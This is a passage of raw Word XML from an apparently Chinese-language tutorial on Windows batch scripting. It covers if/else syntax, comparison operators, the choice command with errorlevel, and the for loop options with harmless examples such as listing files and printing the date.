      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果是多个条件，建议适当使用括号把各条件包起来，以免出错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">     Sample: if 1 == 0 ( echo comment1 ) else if 1==0 ( echo comment2 ) else (echo comment3 )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注：如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> else </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的语句需要换行，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>执行的行尾需用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“^”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>连接，并且</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>执行的动作需用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>括起来</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，否则报错</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     Sample: if 1 == 0 ( echo comment1 ) else if 1==0 ( echo comment2 ) ^</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">             else (echo comment3 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>比较运算符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     EQU - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>一般使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“==”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     NEQ - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> “!=”,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>改用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“ if not 1==1 ”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的写法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     LSS - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     LEQ - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>小于或等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     GTR - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     GEQ - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>大于或等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">9.choice </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  choice </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用此命令可以让用户输入一个字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用于选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，从而根据用户的选择返回不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> errorlevel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>然后配合</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> if errorlevel </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>选择运行不同的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>choice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统提供的外部命令，不同版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>choice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令语法会稍有不同，请用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>choice /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看用法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  choice </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用此命令可以让用户输入一个字符，从而运行不同的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用时应该加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/c:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>c:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后应写提示可输入的字符，之间无空格。它的返回码为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1234……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0"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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    Sample:  choice /c:dme defrag,mem,end</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:  defrag,mem,end[D,M,E]?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    Sample:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    choice /c:dme defrag,mem,end</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    if errorlevel 3 goto defrag (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>应先判断数值最高的错误码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    if errorlevel 2 goto mem</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    if errotlevel 1 goto end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片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r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">10.for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   1) for {%variable | %%variable} in (set) do command [command-parameters]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      %variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定一个单一字母可替换的参数。变量名称是区分大小写的，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不同于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %I</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在批处理文件中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> FOR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令时，指定变量建议用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %%variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>而不要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      (set) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定一个或一组文件。可以使用通配符。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      command </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定对每个文件执行的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      command-parameters </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为特定命令指定参数或命令行开关。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果命令扩展名被启用，下列额外的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> FOR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令格式会受到支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      a.FOR /D %variable IN (set) DO command [command-parameters]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果集里面包含通配符，则指定与目录名匹配，而不与文件名匹配。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      b.FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>检查以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> [drive:]path </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为根的目录树，指向每个目录中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">FOR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语句。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /R </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后没有指定目录，则使用当前目录。如果集仅为一个单点</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(.)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>字符，则枚举该目录树。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      c.FOR /L %variable IN (start,step,end) DO command [command-parameters]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>该集表示以增量形式从开始到结束的一个数字序列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">(1,1,5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将产生序列</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> 1 2 3 4 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">(5,-1,1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将产生序列</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> (5 4 3 2 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>有或者没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> usebackq </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        FOR /F ["options"] %variable IN (file-set) DO command</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        FOR /F ["options"] %variable IN ("string") DO command</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        FOR /F ["options"] %variable IN (command)  DO command</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"options"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        eol=c           - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指一个行注释字符的结尾</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“;”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        skip=n          - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指在文件开始时忽略的行数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        delims=xxx      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指分隔符集。这个替换了空格和跳格键的默认分隔符集。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        tokens=x,y,m-n  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指每行的哪一个符号被传递到每个迭代的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>本身。这会导致额外变量名称的分配。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">                          m-n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式为一个范围。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> nth </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>符号指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> mth</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        usebackq        - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定新语法已在下类情况中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> filenameset</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中使用双引号扩起文件名称。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   3) Sample:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如下命令行会显示当前目录下所有以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为扩展名的文件名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         for %%c in (*.bat *.txt) do (echo %%c)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      a. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如下命令行会显示当前目录下所有包含有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的目录名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         for /D %%a in (*e* *i*) do echo %%a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      b. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如下命令行会显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> E</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>下所有以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为扩展名的文件名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         for /R E:\test %%b in (*.txt *.bat) do echo %%b</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         for /r %%c in (*) do (echo %%c)  :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>遍历当前目录下所有文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      c. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如下命令行将产生序列</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> 1 2 3 4 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         for /L %%c in (1,1,5) do echo %%c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      d. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以下两句，显示当前的年月日和时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         For /f "tokens=1-3 delims=-/. " %%j In ('Date /T') do echo %%j</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%%k</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%%l</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>日</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         For /f "tokens=1,2 delims=: " %%j In ('TIME /T') do echo %%j</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%%k</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>分</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      e. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>把记事本中的内容每一行前面去掉</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         setlocal enabledelayedexpansion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         for /f %%i in (zhidian.txt) do (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:tab/>
        <w:t xml:space="preserve">   set atmp=%%i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:tab/>
        <w:t xml:space="preserve">   set atmp=!atmp:~8!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">           if {!atmp!}=={} ( echo.) else echo !atmp!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>读取记事本里的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> delims </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是为了把一行显示全</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>否则会以空格为分隔符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         for /f "delims=" %%a in (zhidian.txt) do echo.%%a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   4) continue </w:t>
      </w:r>
